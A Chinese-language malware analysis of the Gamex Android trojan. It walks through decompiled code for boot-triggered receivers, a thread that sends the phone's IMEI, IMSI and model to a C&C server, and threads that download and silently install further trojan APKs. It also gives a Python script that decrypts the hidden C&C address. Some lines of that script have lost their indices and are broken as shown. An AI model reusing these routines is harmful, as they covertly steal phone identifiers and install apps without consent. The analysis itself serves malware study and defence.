这也验证了SDBoost发送奇怪字符串广播的分析,看第一个广播接收者代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

public class B extends BroadcastReceiver

{

  public static final String q = “android.intent.action.BOOT_COMPLETED”;

  public static final String qx = “kurhjfngjhfjghdfjgjjdh”;

  public void onReceive(Context paramContext, Intent paramIntent)

  {

    if ((paramIntent.getAction().equals(“android.intent.action.BOOT_COMPLETED”)) || (paramIntent.getAction().equals(“kurhjfngjhfjghdfjgjjdh”)))

      A.b(paramContext);

  }

}

这个A.b()方法启动了Settings.class服务,这个服务里面启动了一个线程,可以找到前面分析线程的类似框架代码如下:

public void run()

  {

    try

    {

      this.this$0.d();

      sleep(30000L);

      if ((!A.a) && (A.c()) && (A.d(this.this$0)))

      {

        A.a = 1;

        Settings localSettings1 = this.this$0;

        new E(localSettings1).start();

        return;

      }

    }

    catch (InterruptedException localInterruptedException)

    {

      …

    }

  }

d()负责解码C&C(Control & Command)服务器地址并发送手机的隐私信息,解码代码为Settings的getUrl()方法,使用python解码实现为:

# -*- coding:utf-8 -*-

import sys

def decrypt2url(decryptedfile):

    f = file(decryptedfile,”r”)

    buf = f.read()

    bs = map(ord, buf) #将字节流存储为10进制的list

    sizz = len(bs)

    for i in range(0, sizz, 2):  #后面的字与前面的字交换存储

        if i >= sizz / 2 : break

        d = bs

        bs = bs[sizz – 1 – i]

        bs[sizz – 1 – i] = d

    ss = ”.join(map(chr,bs))

    bs2 = ss.split(‘,’) #用逗号分隔开

    bss = list(bs2)

    sout = ”

    for i in range(0, len(bss), 2):

        sout = sout + chr(int(bss))

    print sout

def main(filename):

    PASS = ”.join(chr(x) for x in [9, 5, 9, 8, 5]) #这个是解密的原子

    infile = file(filename,”rb”)

    outfile = file(filename[:-4]+”.txt”,”wb”)

    i = 0

    while 1:

        c = infile.read(1)

        if not c:

            break

        j = i % 5

        d = PASS[j]

        c = chr(ord(c) ^ ord(d))

        i = i + 1

        outfile.write(c)

    outfile.close()

    infile.close()

    decrypt2url(filename[:-4]+”.txt”)

if __name__ == ‘__main__’:

    main(sys.argv[1])

这段解密脚本首先将“logo.png”文件的每个字节与[9, 5, 9, 8, 5]解密原子进行异或,解出来后的内容如图3所示:

 

图 3

得到这个字符串后,将字符串首尾倒序排列一次,排列完毕后的每一个逗号分隔的数字为一个字母的ASCII码,然后取这些ASCII的偶数位得到最终的URL地址,另外,为了照顾使用JAVA的同学,解密代码我也用JAVA实现了一份,在附件中一起打包了,解密出的结果如图4所示:

 

图 4

这个网址直接访问是提示禁止的,在d()方法中,将getDeviceId()、getSubscriberId(),Build.MODEL,getApplicationInfo(str3, 128).metaData.getString(“CMP_PID”)的结果与其它字符组合得到最终的网址为“http://www.fineandroid.com/inputex/index.php?s=/Interface/keinter/a1/DeviceId/a2/SubscriberId/a3/MODEL/index/xian1234”,最后调用b(String)方法启动一个线程将信息发送出去,代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

public void run()

  {

    …

    HttpGet localHttpGet = new HttpGet(str);

    try

    {

      HttpResponse localHttpResponse = new DefaultHttpClient().execute(localHttpGet);

      if ((localHttpResponse.getStatusLine().getStatusCode() == 200) && (EntityUtils.toString(localHttpResponse.getEntity()).equals(“1”)))

      {

        SharedPreferences.Editor localEditor1 = this.this$0.getSharedPreferences(“tijiao”, 0).edit();

        SharedPreferences.Editor localEditor2 = localEditor1.putInt(“biaoji”, 1);

        boolean bool = localEditor1.commit();

      }

      return;

    }

    catch (ClientProtocolException localClientProtocolException)

    {

      …

    }

     …

  }

如果提交成功就保存到SharedPerferences中,我们构造字符串手动访问如图5所示:

 

图 5

继续回到刚才Settings.1线程,在做完这些工作后,又开始判断了,A.a判断木马是否已经运行,A.c()判断SD卡是否已经准备到位,A.d(Context)判断是否有安装“com.android.update”木马程序,如果没有安装且上面的条件满足,就开启一个E线程做工作,E线程启动就注册了两只广播接收者“android.intent.action.PACKAGE_ADDED”与“android.intent.action.PACKAGE_CHANGED”,广播接收为收到“Intent(“akjgikurhnfjghfkj”)”广播后就启动Settings.class服务,在完成这一步后,线程运行,解码出“com.android.update”木马程序,方法与上面“com.android.setting”代码是一样的,可以用前面的“decrypt_apk.py”脚本解密得出木马APK文件,解出来后调用a()方法来安装“com.android.update”木马。到这里,由B类开机广播接收者引发的木马安装与信息发送到这里就完了,看看另一个D类的开机广播接收者的代码,它的代码很简单,收到广播后,获取木马的包名,然后在a()方法中调用“pm install -r”来重新安装木马,这个“com.android.setting”木马就分析到这里,下面看看“com.android.update”。这也是Gamex木马的最核心部分,

这个“com.android.update”木马核心的启动由开机广播完成的,如图6所示:

 

图 6

广播接收者的代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

public class B extends BroadcastReceiver

{

  public static final String a = “akjgikurhnfjghfkj”;

  public static final String q = “android.intent.action.BOOT_COMPLETED”;

  public void onReceive(Context paramContext, Intent paramIntent)

  {

    if ((paramIntent.getAction().equals(“android.intent.action.BOOT_COMPLETED”)) || (paramIntent.getAction().equals(“akjgikurhnfjghfkj”)))

      A.boot(paramContext);

  }

}

在收到广播后,调用A类boot()方法启动了Updater.class服务,这个服务生了四个类来完成所有的木马工作,代码为:

public void onStart(Intent paramIntent, int paramInt)

  {

    super.onStart(paramIntent, paramInt);

    D localD = new D(this);

    this.activityThread = localD;

    F localF = new F(this);

    this.getSoftThread = localF;

    G localG = new G(this);

    this.downSoftThread = localG;

    H localH = new H(this);

    this.installSoftThread = localH;

  }

四个对象分工明确,我们慢慢来分析,第一个对象D为“卫兵”对象,负责“通风报信”的工作,在对象构造时注册了广播接收者D.1分别监听“”android.intent.action.SCREEN_OFF”与“android.intent.action.SCREEN_ON”,当后者被触发时就启动HOME进行来隐藏自己,前者被触发时就默默的收集用户安装的软件信息,步骤为D.1首先调用D对象M成员的d()方法来查询已经安装而没有运行的木马软件,M成员为D对象中的数据库查询操作对象,在D对象初始化的时候创建,接着调用D.f()方法获取正在运行的软件,并与M.d()方法返回的列表进行比较,如果找到未运行的程序,localPackageManager.getLaunchIntentForPackage(String)来获取Activity名称,并调用paramContext.startActivity(localIntent1)启动该程序,再调用M.j(String)方法来更新软件运行状态数据库,最后调用D.n(String)方法往C&C服务器发送信息,代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

public void n(String paramString)

  {

    String str1 = ((TelephonyManager)this.g.getSystemService(“phone”)).getDeviceId(); //获取IMEI

    if (str1 == null)

      str1 = “”;

    String str2 = String.valueOf(j());

    String str3 = String.valueOf(str2 + “inputex/index.php?s=/Interface/neiinter/a1/”);

    String str4 = str3 + str1 + “/nam/” + paramString;

    j(str4);

  }

j()方法用来解密Assets目录下的”icon.png”文件来获取C&C地址,依旧可以使用decrypt_url.py来解密,解密后的地址仍然是“http://www.fineandroid.com/”,组合生成URL后调用j(String)发送出去,方法与“com.android.android”是一样的,到这里,D对象就算了解了,下一个是F对象。F对象也很简单,它读取木马服务器上的木马列表,并将列表写入本地数据库中供木马查询,F.k()解得地址为“http://fineandroid.com/InstallApk/php4sam.php”,直接访问如图7所示:

 

图 7

这个木马作者是中国人,有没有?整个html内容的解读是由J.a(InputStream)完成的,这里限于篇幅就不帖出来了,最后得到的List数据是通过M.g(String,…)插入数据库的,在保存前调用了F.e(String)进行了简单的加密,我就不分析了,看看第三个G类,它负责木马的下载工作,核心的方法为loop(),首先调用M.C()检查没有下载的木马软件,如果有软件没有下载,就检查是否在WIFI环境下,如果条件都满足就new了一个P对象,后者调用K.d(String,…)开始下载,下载完成后调用M.h()设置木马的下载状态,这些工作都做完后让线程进入睡眠状态,WIFI状态下休息1分钟,非WIFI状态下休息5个小时。相应的代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

protected void loop()

  {

    NetworkInfo localNetworkInfo = ((ConnectivityManager)this.e.getSystemService(“connectivity”)).getActiveNetworkInfo();

    List localList;

    if ((localNetworkInfo != null) && (localNetworkInfo.isAvailable()) && (!this.d))

    {

      localList = this.h.c();

      if (localList.size() == 0)

        setSleepTime(60000L);  //如果没有软件要下载,就休息1分钟

    }

    while (true)

    {

      return;

      if (localNetworkInfo.getTypeName().equals(“WIFI”)) //是否在WIFI网络状态下

      {

        localIterator = localList.iterator();

        if (!localIterator.hasNext())

          continue;

        …

        Handler localHandler1 = this.f;

        new P(localContext1, str1, str2, “download/”, str3, localHandler1).start(); //开始下载

        this.d = 1;

        setSleepTime(60000L);  //下载完就休息1分钟

        continue;

      }

      …

      new P(localContext2, str4, str5, “download/”, str6, localHandler2).start();//开始下载

      this.d = 1;

      setSleepTime(18000000L); //休息5小时

      …

    }

  }

最后的H类是安装类,它没有做实质性的工作,只是隔一段时间发一生广播并更新一下已下载的木马软件状态到数据库中。到这里,整个Gamex木马就分析完了。

总结

通过对Gamex木马的分析,我们看到其中用到了代码捆绑、软件静默安装、URL提交与响应、开机广播,文件加解密等大量的代码,这些代码在Android程序员日常编码过程中是常见的,只有掌握好Android基础,把握程序的分析思路才能将Android木马看的通透。最后补上一张Gamex的流程图,方便大家理解